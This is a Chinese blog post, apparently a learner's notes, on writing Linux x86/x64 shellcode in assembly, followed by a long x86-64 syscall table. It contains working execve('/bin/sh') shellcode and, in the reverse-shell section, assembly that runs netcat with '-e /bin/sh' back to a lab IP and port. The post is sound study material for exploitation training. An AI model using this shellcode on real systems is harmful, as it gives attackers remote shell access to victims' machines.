# 前言
这里先贴上 ZIKH26 师傅的 bolg 用汇编语言构造简单的 shellcode(64 位 &&32 位)以及将汇编语言转换成机器码的方法 | ZIKH26's Blog,话说真的有从这个地方入门 pwn 的吗😹,可怜的 web 手上来被 pwn 师傅劝退,这里只是在学习的过程中浅浅的记录一下,如同标题一样,水货满满😿
# Shell or Webshell?
当然作为一个 web 手,说起来 shell 我第一反应还是 webshell。所以当 pwn 师傅告诉我去搓一个 shellcode 的时候,只能说我答应的很快,但是开始搓的时候,,,问题不大不,“广大青年要保持初生牛犊不怕虎的劲头,不懂就学,不会就练,没有条件就努力创造条件”。听习大大的没毛病。既然都到这了就简单说一下这三者:
- Shell:简单来说就是一个命令行的解释器,它接受用户输入的文本命令并将其传递给操作系统内核执行 ,一般是操作系统提供给用户的一种可以控制和管理计算机的接口。
- WebShell:它是一种以 asp,php,jsp 或者 cgi 等文件存在的一种可以进行命令执行的一种环境,这个环境中可以使用 shell,一般是在一个网站被攻陷后,被上传的一种提供远程与计算机和服务器进行交互的环境,通常是一种 web 应用程序漏洞的结果。
- ShellCode:它通常是攻击者利用漏洞或者其他手段来注入到受害者系统中的一小段 16 进制的机器码,作用一般也是用来远程的控制计算机和服务器,和 webshell 的效果很相似,但是表现形式略有不同
在本篇中主要是来学习一下 ShellCode 的编写
# 前置知识
# 系统调用
计算机各种的硬件资源都不是无限的,为了提高计算机的使用效率就需要对各种资源进行分配管理,用户进程是不允许直接操作和访问这些资源的,所有对这些资源的访问都需要再操作系统的控制下,系统调用实际上就是为用户态的进程提供的与硬件资源的交互接口。它实际上就是函数调用,不过调用的是出于内核态的系统函数
# 系统调用号
唯一标识系统调用的 ID,这个 ID 就是系统调用号如上图中再文件 /usr/include/x86_64-linux-gnu/asm/unistd_32.h 中存放的 32 为系统的调用号,当然 64 为的同样也有在 /usr/include/x86_64-linux-gnu/asm/unistd_64.h
# 系统调用表
系统调用程序 system_call 会查找系统调用表以获得系统调用号对应的系统调用并执行,详细的表看文末
# 64 位编写 shellcode
基础知识这个地方其实我一直没想好该怎么写,汇编严格意义上来说也算是基础,因为本身也是初学者,所以我一直想把这些东西写的详细一点,以便我后来翻阅,但是这个并不是三言两语就能够写好的,还是要看平时的积累,这里也不在啰嗦
在这里我的目的不是诗和远方,我只需要一个代码执行或者一个命令执行的入口,这里就先搓一个 execve (“/bin/sh”,0,0)
这里想要使用这个函数,rax 要为 0x3b(这个对应的是系统调用号),三个参数分别放到寄存器的 rdi,rsi,rdx 中,这里可以翻阅文末的系统调用表,所以接下来要做的事情就比较明了了
将 0x3b 放入 rax 后通过 syscall 就可以调用到 execve 函数,然后通过给 rdi,rsi,rdx 压入值来实现调用,先看下面这段汇编
section .text
global _start
_start:
xor rsi,rsi
xor rdx,rdx #rdx和rsi存入0
mov rax,0x68732f6e69622f #/bin/sh存入rax
push rax
push rsp #将rax的地址压入栈中
pop rdi
push 0x3b
pop rax
syscall
这样似乎就已经完成了一个简单的 shellcode 的编写
mov rax,0x68732f6e69622f
push rax
push rsp
pop rdi
值得注意的是,这里存入 rdi 的并不是 ascii 码,而是其对应的地址,如果这里直接
mov rdi,0x68732f6e69622f
看起来好像很合理且比上面要精简很多,但是看下面的两张图
这里张图是 “精简” 的写法
这张图是原本的写法,很显然所谓 “精简” 的写法是不能正确的执行的,这里很明显,我们需要存入 rdi 的不是 /bin/sh 对应的 ascii 码,我们要将 /bin/sh 对应的 ascii 码的地址存入 rdi
还值得注意的是 rsi 和 rdx 都需要存为 0,但是上面并没有使用 mov 来实现,而是使用了 xor,这里是一个有趣的现象,在 ZIKH26 师傅的文章中是这样解释的:
- 避免出现
\x00字符来截断,当然了\x00并不是所有情况都会截断函数,只有用strcpy这类函数时才会考虑\x00截断 xor rsi,rsi比mov rsi,0所需的字节数更少
对于第一点可以看一下下面这个表
| 函数 | 截断字符 | 截断属性 | 截断字符是否保留 | 截断后加 |
|---|---|---|---|---|
read(0,a,0x100) | EOF | 无 | 无 | 无 |
*a = getchar() | EOF | 无 | 无 | 无 |
scanf("%c",a) | EOF | 无 | 无 | 无 |
scanf("%s",a) | EOF 0x09 0x0A 0x0B 0x0C 0x0D 0x20 | 截断字符前有有效内容则截断,如无有效内容则跳过截断字符读后面 | 不保留 | 0x00 |
sscanf(a,"%s",b) | 0x00 0x09 0x0A 0x0B 0x0C 0x0D 0x20 | 截断字符前有有效内容则截断,如无有效内容则跳过截断字符读后面 | 不保留 | 0x00 |
gets(a) | EOF 0x0A | 截断字符前无论有无有效内容均截断 | 不保留 | 0x00 |
fgets(a,256,stdin) | EOF 0x0A | 截断字符前无论有无有效内容均截断 | 保留 | 0x00 |
sscanf(a,"%[^;];",b) | 0x00 0x3B | 无 | 不保留 | 0x00 |
sprintf(b,"%s",a) | 0x00 | 无 | 保留 | 无(相当于截断字符不保留,截断后加 0x00) |
strcpy(b,a) | 0x00 | 无 | 保留 | 无(相当于截断字符不保留,截断后加 0x00) |
strcat(b,a) | 0x00 | 无 | 保留 | 无(相当于截断字符不保留,截断后加 0x00) |
strncat(b,a,0x10) | 0x00 | 无 | 保留 | 无(相当于截断字符不保留,截断后加 0x00) |
strncat(b,a,0x10) | 到达拷贝长度 | 无 | 保留 | 如果到达拷贝长度,则自动补上 0x00 |
| 来自 [CTF 中常见的 C 语言输入函数截断属性总结 | Clang 裁缝店 (xuanxuanblingbling.github.io)](https://xuanxuanblingbling.github.io/ctf/pwn/2020/12/16/input/) |
对于第二点,首先是使用 xor 的
然后对比一下使用 mov 的
这里就已经可以可以这个 shellcode 去拿到一个 shell 了,但是这里当我在尝试去执行 execve (“/bin/pwd”,0,0) 的时候却报错了
section .text
global _start
_start:
xor rsi,rsi
xor rdx,rdx
mov rax,0x6477702f6e69622f
push rax
push rsp
pop rdi
push 0x3b
pop rax
syscall
这里调试看一下最后函数调用的地方
看起来似乎很合理但是不能正常运行,原因同样在 ZIKH26 师傅的文章中也能找到答案,之前使用的 /bin/sh 命令是 7 个字节,程序发现了我们这个内存单元的内容不够八字节,它会自己帮我们添加一个 00 上去以来凑齐八字节,这个 00 刚好就用来声明字符串的结束,很显然这次我们使用的命令 /bin/pwd 本身就已经是 8 个字节了,我们就需要去栈中存入一个 0 来声明字符串的结束
section .text
global _start
_start:
xor rsi,rsi
xor rdx,rdx
push rdx
mov rax,0x6477702f6e69622f
push rax
push rsp
pop rdi
push 0x3b
pop rax
syscall
很显然这里就成功了
当遇到 strcpy 等函数 shellcode 会被截断,上面的 /bin/sh 可以用 /bin//sh 来代替
写到这里我其实还有一个疑问,如果命令长度大于 8 个字节呢?这里会放到 32 位 shellcode 后面,因为处理方式就在 32 位的记录中有答案
# 32 位编写 shellcode
如果说前面的 64 位的已经掌握,其实 32 位的 shellcode 基本相似,不过这里最后使用的系统调用不是 syscall,而是 int 0x80
第一步,就是需要将系统调用号存入 eax。
第二步,ebx 用于保存函数调用的第一个参数(ecx 存放第二个参数,edx 存放第三个参数,esi 存放第四个参数,edi 存放第五个参数)
查询系统调用表,可以看到这里 execve 的系统调用号是 11,三个参数分别使用寄存器 ebx ecx edx
section .text
global _start
_start:
xor ecx,ecx
xor edx,edx
push edx
push 0x68732f2f #/bin
push 0x6e69622f #//sh
mov ebx,esp
push 0x0b
pop eax
int 0x80
唯一的区别是这里不能一次将所有的命令都压入栈中,而是分了两次把最上面那个的地址取出来就行了,组合起来就是连续的
# 拓展
如果这里想要执行的命令这里先尝试一下 execve (“/bin/whoami”,0,0)
很显然直接
mov rax,0x696d616f68772f6e69622f
是行不通的,但是可以参考 32 位的写法,压多次全部存到栈上
section .text
global _start
_start:
xor rsi,rsi
push rsi
mov rdx,0x696d61
push rdx
mov rdx,0x6f68772f6e69622f
push rdx
mov rdi,rsp
push 0x3b
pop rax
xor rdx,rdx
syscall
值得注意的是,这里后入栈的需要将 8 字节填满防止被自动填充的 00 截断
# 反弹 shell (命令执行)
上面算是最基础的用法了吧,但是前面都是没有参数的命令,下面来尝试进行反弹 shell,这里就用最常见的 nc 来测试 /bin/nc 192.168.246.129 2444 -e /bin/sh
section .text
global _start
_start:
;execve("/bin/nc",{"/bin/nc","192.168.246.129","2444","-e","/bin/sh"},0)
;636e2f6e69622f ;/bin/nc
;3932312e3634322e3836312e323931 ;192.168.246.129
;68732f6e69622f ;/bin/sh
;34343432 ;2444
;652d ;-e
xor rsi,rsi
push rsi
mov rbx,0x68732f6e69622f;/bin/sh
push rbx
push rsp
pop rbx
push rsi
mov rbp,0x652d;-e
push rbp
push rsp
pop rbp
push rsi
mov rcx,0x34343432;2444
push rcx
push rsp
pop rcx
push rsi
mov rdx,0x3932312e363432
push rdx
mov rdx,0x2e3836312e323931;ip
push rdx
push rsp
pop rdx
push rsi
mov rdi,0x636e2f6e69622f;/bin/nc
push rdi
push rsp
pop rdi
push rsi
push rbx
push rbp
push rcx
push rdx
push rdi
mov rsi,rsp
xor rdx,rdx
push 0x3b
pop rax
syscall
值得一提的是 execve 函数中 argv 是提供给程序的参数字符串数组,通常情况下 argv [0] 需要与第一个参数 filename 中的 basename 相同
# 系统调用表
来源
Linux system call table 정리(32bit, 64bit) (tistory.com)
# 在 64 位系统中
| syscall number | syscall | %rax | %rdi | %rsi | %rdx | %rcx | %r8 | %r9 |
|---|---|---|---|---|---|---|---|---|
| 0 | sys_read | 0x0 | unsigned int fd | char *buf | size_t count | |||
| 1 | sys_write | 0x1 | unsigned int fd | const char *buf | size_t count | |||
| 2 | sys_open | 0x2 | const char *filename | int flags | int mode | |||
| 3 | sys_close | 0x3 | unsigned int fd | |||||
| 4 | sys_stat | 0x4 | const char *filename | struct stat *statbuf | ||||
| 5 | sys_fstat | 0x5 | unsigned int fd | struct stat *statbuf | ||||
| 6 | sys_lstat | 0x6 | fconst char *filename | struct stat *statbuf | ||||
| 7 | sys_poll | 0x7 | struct poll_fd *ufds | unsigned int nfds | long timeout_msecs | |||
| 8 | sys_lseek | 0x8 | unsigned int fd | off_t offset | unsigned int origin | |||
| 9 | sys_mmap | 0x9 | unsigned long addr | unsigned long len | unsigned long prot | unsigned long flags | unsigned long fd | unsigned long off |
| 10 | sys_mprotect | 0xA | unsigned long start | size_t len | unsigned long prot | |||
| 11 | sys_munmap | 0xB | unsigned long addr | size_t len | ||||
| 12 | sys_brk | 0xC | unsigned long brk | |||||
| 13 | sys_rt_sigaction | 0xD | int sig | const struct sigaction *act | struct sigaction *oact | size_t sigsetsize | ||
| 14 | sys_rt_sigprocmask | 0xE | int how | sigset_t *nset | sigset_t *oset | size_t sigsetsize | ||
| 15 | sys_rt_sigreturn | 0xF | unsigned long __unused | |||||
| 16 | sys_ioctl | 0x10 | unsigned int fd | unsigned int cmd | unsigned long arg | |||
| 17 | sys_pread64 | 0x11 | unsigned long fd | char *buf | size_t count | loff_t pos | ||
| 18 | sys_pwrite64 | 0x12 | unsigned int fd | const char *buf | size_t count | loff_t pos | ||
| 19 | sys_readv | 0x13 | unsigned long fd | const struct iovec *vec | unsigned long vlen | |||
| 20 | sys_writev | 0x14 | unsigned long fd | const struct iovec *vec | unsigned long vlen | |||
| 21 | sys_access | 0x15 | const char *filename | int mode | ||||
| 22 | sys_pipe | 0x16 | int *filedes | |||||
| 23 | sys_select | 0x17 | int n | fd_set *inp | fd_set *outp | fd_set*exp | struct timeval *tvp | |
| 24 | sys_sched_yield | 0x18 | ||||||
| 25 | sys_mremap | 0x19 | unsigned long addr | unsigned long old_len | unsigned long new_len | unsigned long flags | unsigned long new_addr | |
| 26 | sys_msync | 0x1A | unsigned long start | size_t len | int flags | |||
| 27 | sys_mincore | 0x1B | unsigned long start | size_t len | unsigned char *vec | |||
| 28 | sys_madvise | 0x1C | unsigned long start | size_t len_in | int behavior | |||
| 29 | sys_shmget | 0x1D | key_t key | size_t size | int shmflg | |||
| 30 | sys_shmat | 0x1E | int shmid | char *shmaddr | int shmflg | |||
| 31 | sys_shmctl | 0x1F | int shmid | int cmd | struct shmid_ds *buf | |||
| 32 | sys_dup | 0x20 | unsigned int fildes | |||||
| 33 | sys_dup2 | 0x21 | unsigned int oldfd | unsigned int newfd | ||||
| 34 | sys_pause | 0x22 | ||||||
| 35 | sys_nanosleep | 0x23 | struct timespec *rqtp | struct timespec *rmtp | ||||
| 36 | sys_getitimer | 0x24 | int which | struct itimerval *value | ||||
| 37 | sys_alarm | 0x25 | unsigned int seconds | |||||
| 38 | sys_setitimer | 0x26 | int which | struct itimerval *value | struct itimerval *ovalue | |||
| 39 | sys_getpid | 0x27 | ||||||
| 40 | sys_sendfile | 0x28 | int out_fd | int in_fd | off_t *offset | size_t count | ||
| 41 | sys_socket | 0x29 | int family | int type | int protocol | |||
| 42 | sys_connect | 0x2A | int fd | struct sockaddr *uservaddr | int addrlen | |||
| 43 | sys_accept | 0x2B | int fd | struct sockaddr *upeer_sockaddr | int *upeer_addrlen | |||
| 44 | sys_sendto | 0x2C | int fd | void *buff | size_t len | unsigned flags | struct sockaddr *addr | int addr_len |
| 45 | sys_recvfrom | 0x2D | int fd | void *ubuf | size_t size | unsigned flags | struct sockaddr *addr | int *addr_len |
| 46 | sys_sendmsg | 0x2E | int fd | struct msghdr *msg | unsigned flags | |||
| 47 | sys_recvmsg | 0x2F | int fd | struct msghdr *msg | unsigned int flags | |||
| 48 | sys_shutdown | 0x30 | int fd | int how | ||||
| 49 | sys_bind | 0x31 | int fd | struct sokaddr *umyaddr | int addrlen | |||
| 50 | sys_listen | 0x32 | int fd | int backlog | ||||
| 51 | sys_getsockname | 0x33 | int fd | struct sockaddr *usockaddr | int *usockaddr_len | |||
| 52 | sys_getpeername | 0x34 | int fd | struct sockaddr *usockaddr | int *usockaddr_len | |||
| 53 | sys_socketpair | 0x35 | int family | int type | int protocol | int *usockvec | ||
| 54 | sys_setsockopt | 0x36 | int fd | int level | int optname | char *optval | int optlen | |
| 55 | sys_getsockopt | 0x37 | int fd | int level | int optname | char *optval | int *optlen | |
| 56 | sys_clone | 0x38 | unsigned long clone_flags | unsigned long newsp | void *parent_tid | void *child_tid | ||
| 57 | sys_fork | 0x39 | ||||||
| 58 | sys_vfork | 0x3A | ||||||
| 59 | sys_execve | 0x3B | const char *filename | const char *const argv[] | const char *const envp[] | |||
| 60 | sys_exit | 0x3C | int error_code | |||||
| 61 | sys_wait4 | 0x3D | pid_t upid | int *stat_addr | int options | struct rusage *ru | ||
| 62 | sys_kill | 0x3E | pid_t pid | int sig | ||||
| 63 | sys_uname | 0x3F | struct old_utsname *name | |||||
| 64 | sys_semget | 0x40 | key_t key | int nsems | int semflg | |||
| 65 | sys_semop | 0x41 | int semid | struct sembuf *tsops | unsigned nsops | |||
| 66 | sys_semctl | 0x42 | int semid | int semnum | int cmd | union semun arg | ||
| 67 | sys_shmdt | 0x43 | char *shmaddr | |||||
| 68 | sys_msgget | 0x44 | key_t key | int msgflg | ||||
| 69 | sys_msgsnd | 0x45 | int msqid | struct msgbuf *msgp | size_t msgsz | int msgflg | ||
| 70 | sys_msgrcv | 0x46 | int msqid | struct msgbuf *msgp | size_t msgsz | long msgtyp | int msgflg | |
| 71 | sys_msgctl | 0x47 | int msqid | int cmd | struct msqid_ds *buf | |||
| 72 | sys_fcntl | 0x48 | unsigned int fd | unsigned int cmd | unsigned long arg | |||
| 73 | sys_flock | 0x49 | unsigned int fd | unsigned int cmd | ||||
| 74 | sys_fsync | 0x4A | unsigned int fd | |||||
| 75 | sys_fdatasync | 0x4B | unsigned int fd | |||||
| 76 | sys_truncate | 0x4C | const char *path | long length | ||||
| 77 | sys_ftruncate | 0x4D | unsigned int fd | unsigned long length | ||||
| 78 | sys_getdents | 0x4E | unsigned int fd | struct linux_dirent *dirent | unsigned int count | |||
| 79 | sys_getcwd | 0x4F | char *buf | unsigned long size | ||||
| 80 | sys_chdir | 0x50 | const char *filename | |||||
| 81 | sys_fchdir | 0x51 | unsigned int fd | |||||
| 82 | sys_rename | 0x52 | const char *oldname | const char *newname | ||||
| 83 | sys_mkdir | 0x53 | const char *pathname | int mode | ||||
| 84 | sys_rmdir | 0x54 | const char *pathname | |||||
| 85 | sys_creat | 0x55 | const char *pathname | int mode | ||||
| 86 | sys_link | 0x56 | const char *oldname | const char *newname | ||||
| 87 | sys_unlink | 0x57 | const char *pathname | |||||
| 88 | sys_symlink | 0x58 | const char *oldname | const char *newname | ||||
| 89 | sys_readlink | 0x59 | const char *path | char *buf | int bufsiz | |||
| 90 | sys_chmod | 0x5A | const char *filename | mode_t mode | ||||
| 91 | sys_fchmod | 0x5B | unsigned int fd | mode_t mode | ||||
| 92 | sys_chown | 0x5C | const char *filename | uid_t user | git_t group | |||
| 93 | sys_fchown | 0x5D | unsigned int fd | uid_t user | git_t group | |||
| 94 | sys_lchown | 0x5E | const char *filename | uid_t user | git_t group | |||
| 95 | sys_umask | 0x5F | int mask | |||||
| 96 | sys_gettimeofday | 0x60 | struct timeval *tv | struct timezone *tz | ||||
| 97 | sys_getrlimit | 0x61 | unsigned int resource | struct rlimit *rlim | ||||
| 98 | sys_getrusage | 0x62 | int who | struct rusage *ru | ||||
| 99 | sys_sysinfo | 0x63 | struct sysinfo *info | |||||
| 100 | sys_times | 0x64 | struct sysinfo *info | |||||
| 101 | sys_ptrace | 0x65 | long request | long pid | unsigned long addr | unsigned long data | ||
| 102 | sys_getuid | 0x66 | ||||||
| 103 | sys_syslog | 0x67 | int type | char *buf | int len | |||
| 104 | sys_getgid | 0x68 | ||||||
| 105 | sys_setuid | 0x69 | uid_t uid | |||||
| 106 | sys_setgid | 0x6A | git_t gid | |||||
| 107 | sys_geteuid | 0x6B | ||||||
| 108 | sys_getegid | 0x6C | ||||||
| 109 | sys_setpgid | 0x6D | pid_t pid | pid_t pgid | ||||
| 110 | sys_getppid | 0x6E | ||||||
| 111 | sys_getpgrp | 0x6F | ||||||
| 112 | sys_setsid | 0x70 | ||||||
| 113 | sys_setreuid | 0x71 | uid_t ruid | uid_t euid | ||||
| 114 | sys_setregid | 0x72 | git_t rgid | gid_t egid | ||||
| 115 | sys_getgroups | 0x73 | int gidsetsize | gid_t *grouplist | ||||
| 116 | sys_setgroups | 0x74 | int gidsetsize | gid_t *grouplist | ||||
| 117 | sys_setresuid | 0x75 | uid_t *ruid | uid_t *euid | uid_t *suid | |||
| 118 | sys_getresuid | 0x76 | uid_t *ruid | uid_t *euid | uid_t *suid | |||
| 119 | sys_setresgid | 0x77 | gid_t rgid | gid_t egid | gid_t sgid | |||
| 120 | sys_getresgid | 0x78 | git_t *rgid | git_t *egid | git_t *sgid | |||
| 121 | sys_getpgid | 0x79 | pid_t pid | |||||
| 122 | sys_setfsuid | 0x7A | uid_t uid | |||||
| 123 | sys_setfsgid | 0x7B | gid_t gid | |||||
| 124 | sys_getsid | 0x7C | pid_t pid | |||||
| 125 | sys_capget | 0x7D | cap_user_header_t header | cap_user_data_t dataptr | ||||
| 126 | sys_capset | 0x7E | cap_user_header_t header | const cap_user_data_t data | ||||
| 127 | sys_rt_sigpending | 0x7F | sigset_t *set | size_t sigsetsize | ||||
| 128 | sys_rt_sigtimedwait | 0x80 | const sigset_t *uthese | siginfo_t *uinfo | const struct timespec *uts | size_t sigsetsize | ||
| 129 | sys_rt_sigqueueinfo | 0x81 | pid_t pid | int sig | siginfo_t *uinfo | |||
| 130 | sys_rt_sigsuspend | 0x82 | sigset_t *unewset | size_t sigsetsize | ||||
| 131 | sys_sigaltstack | 0x83 | const stack_t *uss | stack_t *uoss | ||||
| 132 | sys_utime | 0x84 | char *filename | struct utimbuf *times | ||||
| 133 | sys_mknod | 0x85 | const char *filename | int mode | unsigned dev | |||
| 134 | sys_uselib | 0x86 | NOT IMPLEMENTED | |||||
| 135 | sys_personality | 0x87 | unsigned int personality | |||||
| 136 | sys_ustat | 0x88 | unsigned dev | struct ustat *ubuf | ||||
| 137 | sys_statfs | 0x89 | const char *pathname | struct statfs *buf | ||||
| 138 | sys_fstatfs | 0x8A | unsigned int fd | struct statfs *buf | ||||
| 139 | sys_sysfs | 0x8B | int option | unsigned long arg1 | unsigned long arg2 | |||
| 140 | sys_getpriority | 0x8C | int which | int who | ||||
| 141 | sys_setpriority | 0x8D | int which | int who | int niceval | |||
| 142 | sys_sched_setparam | 0x8E | pid_t pid | struct sched_param *param | ||||
| 143 | sys_sched_getparam | 0x8F | pid_t pid | struct sched_param *param | ||||
| 144 | sys_sched_setscheduler | 0x90 | pid_t pid | int policy | struct sched_param *param | |||
| 145 | sys_sched_getscheduler | 0x91 | pid_t pid | |||||
| 146 | sys_sched_get_priority_max | 0x92 | int policy | |||||
| 147 | sys_sched_get_priority_min | 0x93 | int policy | |||||
| 148 | sys_sched_rr_get_interval | 0x94 | pid_t pid | struct timespec *interval | ||||
| 149 | sys_mlock | 0x95 | unsigned long start | size_t len | ||||
| 150 | sys_munlock | 0x96 | unsigned long start | size_t len | ||||
| 151 | sys_mlockall | 0x97 | int flags | |||||
| 152 | sys_munlockall | 0x98 | ||||||
| 153 | sys_vhangup | 0x99 | ||||||
| 154 | sys_modify_ldt | 0x9A | int func | void *ptr | unsigned long bytecount | |||
| 155 | sys_pivot_root | 0x9B | const char *new_root | const char *put_old | ||||
| 156 | sys__sysctl | 0x9C | struct __sysctl_args *args | |||||
| 157 | sys_prctl | 0x9D | int option | unsigned long arg2 | unsigned long arg3 | unsigned long arg4 | unsigned long arg5 | |
| 158 | sys_arch_prctl | 0x9E | struct task_struct *task | int code | unsigned long *addr | |||
| 159 | sys_adjtimex | 0x9F | struct timex *txc_p | |||||
| 160 | sys_setrlimit | 0xA0 | unsigned int resource | struct rlimit *rlim | ||||
| 161 | sys_chroot | 0xA1 | const char *filename | |||||
| 162 | sys_sync | 0xA2 | ||||||
| 163 | sys_acct | 0xA3 | const char *name | |||||
| 164 | sys_settimeofday | 0xA4 | struct timeval *tv | struct timezone *tz | ||||
| 165 | sys_mount | 0xA5 | char *dev_name | char *dir_name | char *type | unsigned long flags | void *data | |
| 166 | sys_umount2 | 0xA6 | const char *target | int flags | ||||
| 167 | sys_swapon | 0xA7 | const char *specialfile | int swap_flags | ||||
| 168 | sys_swapoff | 0xA8 | const char *specialfile | |||||
| 169 | sys_reboot | 0xA9 | int magic1 | int magic2 | unsigned int cmd | void *arg | ||
| 170 | sys_sethostname | 0xAA | char *name | int len | ||||
| 171 | sys_setdomainname | 0xAB | char *name | int len | ||||
| 172 | sys_iopl | 0xAC | unsigned int level | struct pt_regs *regs | ||||
| 173 | sys_ioperm | 0xAD | unsigned long from | unsigned long num | int turn_on | |||
| 174 | sys_create_module | 0xAE | REMOVED IN Linux 2.6 | |||||
| 175 | sys_init_module | 0xAF | void *umod | unsigned long len | const char *uargs | |||
| 176 | sys_delete_module | 0xB0 | const chat *name_user | unsigned int flags | ||||
| 177 | sys_get_kernel_syms | 0xB1 | REMOVED IN Linux 2.6 | |||||
| 178 | sys_query_module | 0xB2 | REMOVED IN Linux 2.6 | |||||
| 179 | sys_quotactl | 0xB3 | unsigned int cmd | const char *special | qid_t id | void *addr | ||
| 180 | sys_nfsservctl | 0xB4 | NOT IMPLEMENTED | |||||
| 181 | sys_getpmsg | 0xB5 | NOT IMPLEMENTED | |||||
| 182 | sys_putpmsg | 0xB6 | NOT IMPLEMENTED | |||||
| 183 | sys_afs_syscall | 0xB7 | NOT IMPLEMENTED | |||||
| 184 | sys_tuxcall | 0xB8 | NOT IMPLEMENTED | |||||
| 185 | sys_security | 0xB9 | NOT IMPLEMENTED | |||||
| 186 | sys_gettid | 0xBA | ||||||
| 187 | sys_readahead | 0xBB | int fd | loff_t offset | size_t count | |||
| 188 | sys_setxattr | 0xBC | const char *pathname | const char *name | const void *value | size_t size | int flags | |
| 189 | sys_lsetxattr | 0xBD | const char *pathname | const char *name | const void *value | size_t size | int flags | |
| 190 | sys_fsetxattr | 0xBE | int fd | const char *name | const void *value | size_t size | int flags | |
| 191 | sys_getxattr | 0xBF | const char *pathname | const char *name | void *value | size_t size | ||
| 192 | sys_lgetxattr | 0xC0 | const char *pathname | const char *name | void *value | size_t size | ||
| 193 | sys_fgetxattr | 0xC1 | int fd | const har *name | void *value | size_t size | ||
| 194 | sys_listxattr | 0xC2 | const char *pathname | char *list | size_t size | |||
| 195 | sys_llistxattr | 0xC3 | const char *pathname | char *list | size_t size | |||
| 196 | sys_flistxattr | 0xC4 | int fd | char *list | size_t size | |||
| 197 | sys_removexattr | 0xC5 | const char *pathname | const char *name | ||||
| 198 | sys_lremovexattr | 0xC6 | const char *pathname | const char *name | ||||
| 199 | sys_fremovexattr | 0xC7 | int fd | const char *name | ||||
| 200 | sys_tkill | 0xC8 | pid_t pid | ing sig | ||||
| 201 | sys_time | 0xC9 | time_t *tloc | |||||
| 202 | sys_futex | 0xCA | u32 *uaddr | int op | u32 val | struct timespec *utime | u32 *uaddr2 | u32 val3 |
| 203 | sys_sched_setaffinity | 0xCB | pid_t pid | unsigned int len | unsigned long *user_mask_ptr | |||
| 204 | sys_sched_getaffinity | 0xCC | pid_t pid | unsigned int len | unsigned long *user_mask_ptr | |||
| 205 | sys_set_thread_area | 0xCD | NOT IMPLEMENTED. Use arch_prctl | |||||
| 206 | sys_io_setup | 0xCE | unsigned nr_events | aio_context_t *ctxp | ||||
| 207 | sys_io_destroy | 0xCF | aio_context_t ctx | |||||
| 208 | sys_io_getevents | 0xD0 | aio_context_t ctx_id | long min_nr | long nr | struct io_event *events | ||
| 209 | sys_io_submit | 0xD1 | aio_context_t ctx_id | long nr | struct iocb **iocbpp | |||
| 210 | sys_io_cancel | 0xD2 | aio_context_t ctx_id | struct iocb *iocb | struct io_event *result | |||
| 211 | sys_get_thread_area | 0xD3 | NOT IMPLEMENTED. Use arch_prctl | |||||
| 212 | sys_lookup_dcookie | 0xD4 | u64 cookie64 | long buf | long len | |||
| 213 | sys_epoll_create | 0xD5 | int size | |||||
| 214 | sys_epoll_ctl_old | 0xD6 | NOT IMPLEMENTED | |||||
| 215 | sys_epoll_wait_old | 0xD7 | NOT IMPLEMENTED | |||||
| 216 | sys_remap_file_pages | 0xD8 | unsigned long start | unsigned long size | unsigned long prot | unsigned long pgoff | unsigned long flags | |
| 217 | sys_getdents64 | 0xD9 | unsigned int fd | struct linux_dirent64 *dirent | unsigned int count | |||
| 218 | sys_set_tid_address | 0xDA | int *tidptr | |||||
| 219 | sys_restart_syscall | 0xDB | ||||||
| 220 | sys_semtimedop | 0xDC | int semid | struct sembuf *tsops | unsigned nsops | const struct timespec *timeout | ||
| 221 | sys_fadvise64 | 0xDD | int fd | loff_t offset | size_t len | int advice | ||
| 222 | sys_timer_create | 0xDE | const clockid_t which_clock | struct sigevent *timer_event_spec | timer_t *created_timer_id | |||
| 223 | sys_timer_settime | 0xDF | timer_t timer_id | int flags | const struct itimerspec *new_setting | struct itimerspec *old_setting | ||
| 224 | sys_timer_gettime | 0xE0 | timer_t timer_id | struct itimerspec *setting | ||||
| 225 | sys_timer_getoverrun | 0xE1 | timer_t timer_id | |||||
| 226 | sys_timer_delete | 0xE2 | timer_t timer_id | |||||
| 227 | sys_clock_settime | 0xE3 | const clockid_t which_clock | const struct timespec *tp | ||||
| 228 | sys_clock_gettime | 0xE4 | const clockid_t which_clock | struct timespec *tp | ||||
| 229 | sys_clock_getres | 0xE5 | const clockid_t which_clock | struct timespec *tp | ||||
| 230 | sys_clock_nanosleep | 0xE6 | const clockid_t which_clock | int flags | const struct timespec *rqtp | struct timespec *rmtp | ||
| 231 | sys_exit_group | 0xE7 | int error_code | |||||
| 232 | sys_epoll_wait | 0xE8 | int epfd | struct epoll_event *events | int maxevents | int timeout | ||
| 233 | sys_epoll_ctl | 0xE9 | int epfd | int op | int fd | struct epoll_event *event | ||
| 234 | sys_tgkill | 0xEA | pid_t tgid | pid_t pid | int sig | |||
| 235 | sys_utimes | 0xEB | char *filename | struct timeval *utimes | ||||
| 236 | sys_vserver | 0xEC | NOT IMPLEMENTED | |||||
| 237 | sys_mbind | 0xED | unsigned long start | unsigned long len | unsigned long mode | unsigned long *nmask | unsigned long maxnode | unsigned flags |
| 238 | sys_set_mempolicy | 0xEE | int mode | unsigned long *nmask | unsigned long maxnode | |||
| 239 | sys_get_mempolicy | 0xEF | int *policy | unsigned long *nmask | unsigned long maxnode | unsigned long addr | unsigned long flags | |
| 240 | sys_mq_open | 0xF0 | const char *u_name | int oflag | mode_t mode | struct mq_attr *u_attr | ||
| 241 | sys_mq_unlink | 0xF1 | const char *u_name | |||||
| 242 | sys_mq_timedsend | 0xF2 | mqd_t mqdes | const char *u_msg_ptr | size_t msg_len | unsigned int msg_prio | const stuct timespec *u_abs_timeout | |
| 243 | sys_mq_timedreceive | 0xF3 | mqd_t mqdes | char *u_msg_ptr | size_t msg_len | unsigned int *u_msg_prio | const struct timespec *u_abs_timeout | |
| 244 | sys_mq_notify | 0xF4 | mqd_t mqdes | const struct sigevent *u_notification | ||||
| 245 | sys_mq_getsetattr | 0xF5 | mqd_t mqdes | const struct mq_attr *u_mqstat | struct mq_attr *u_omqstat | |||
| 246 | sys_kexec_load | 0xF6 | unsigned long entry | unsigned long nr_segments | struct kexec_segment *segments | unsigned long flags | ||
| 247 | sys_waitid | 0xF7 | int which | pid_t upid | struct siginfo *infop | int options | struct rusage *ru | |
| 248 | sys_add_key | 0xF8 | const char *_type | const char *_description | const void *_payload | size_t plen | ||
| 249 | sys_request_key | 0xF9 | const char *_type | const char *_description | const char *_callout_info | key_serial_t destringid | ||
| 250 | sys_keyctl | 0xFA | int option | unsigned long arg2 | unsigned long arg3 | unsigned long arg4 | unsigned long arg5 | |
| 251 | sys_ioprio_set | 0xFB | int which | int who | int ioprio | |||
| 252 | sys_ioprio_get | 0xFC | int which | int who | ||||
| 253 | sys_inotify_init | 0xFD | ||||||
